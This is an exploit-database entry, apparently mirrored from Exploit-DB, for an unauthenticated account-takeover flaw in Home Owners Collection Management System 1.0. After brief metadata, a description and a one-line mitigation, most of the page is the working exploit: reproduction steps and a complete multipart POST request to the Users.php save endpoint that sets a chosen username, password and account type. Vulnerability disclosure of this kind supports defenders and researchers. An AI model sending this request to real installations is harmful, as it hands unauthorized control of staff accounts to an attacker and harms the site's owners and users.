Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated)

vendor:

Home Owners Collection Management System

by:

Saud Alenazi

8.8

CVSS

HIGH

Account Takeover

284

CWE

Product Name: Home Owners Collection Management System

Affected Version From: 1

Affected Version To: 1

Patch Exists: No

Related CWE:

CPE: a:sourcecodester:home_owners_collection_management_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: XAMPP, Linux

2022

Home Owners Collection Management System 1.0 – Account Takeover (Unauthenticated)

Home Owners Collection Management System is vulnerable to unauthenticated account takeover. An attacker can takeover any registered 'Staff' user account by just sending a POST request with modified parameters such as 'id', 'firstname', 'lastname', 'username', 'password', and 'type'.

Mitigation:

Ensure that authentication is required for all user accounts and that all user input is properly sanitized.

Source

Exploit-DB raw data:

# Exploit Title: Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated)
# Date: 9/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Linux 


Home Owners Collection Management System is vulnerable to unauthenticated account takeover.
An attacker can takeover any registered 'Staff' user account by just sending below POST request
By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters

#Steps to Reproduce

1. Send the below POST request by changing "id", "firstname", "lastname" , "username" , "password" ,"type" parameters.

2. Go to http://localhost/hocms/admin/ and Log in to the user account by changed username and password


==============================================

POST /hocms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------8012296389370411172619882391
Content-Length: 899
Origin: http://localhost
Connection: close
Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju

-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="id"


-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="firstname"

hi
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="lastname"

test
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="username"

saud
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="password"

saud
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="type"

1
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------8012296389370411172619882391--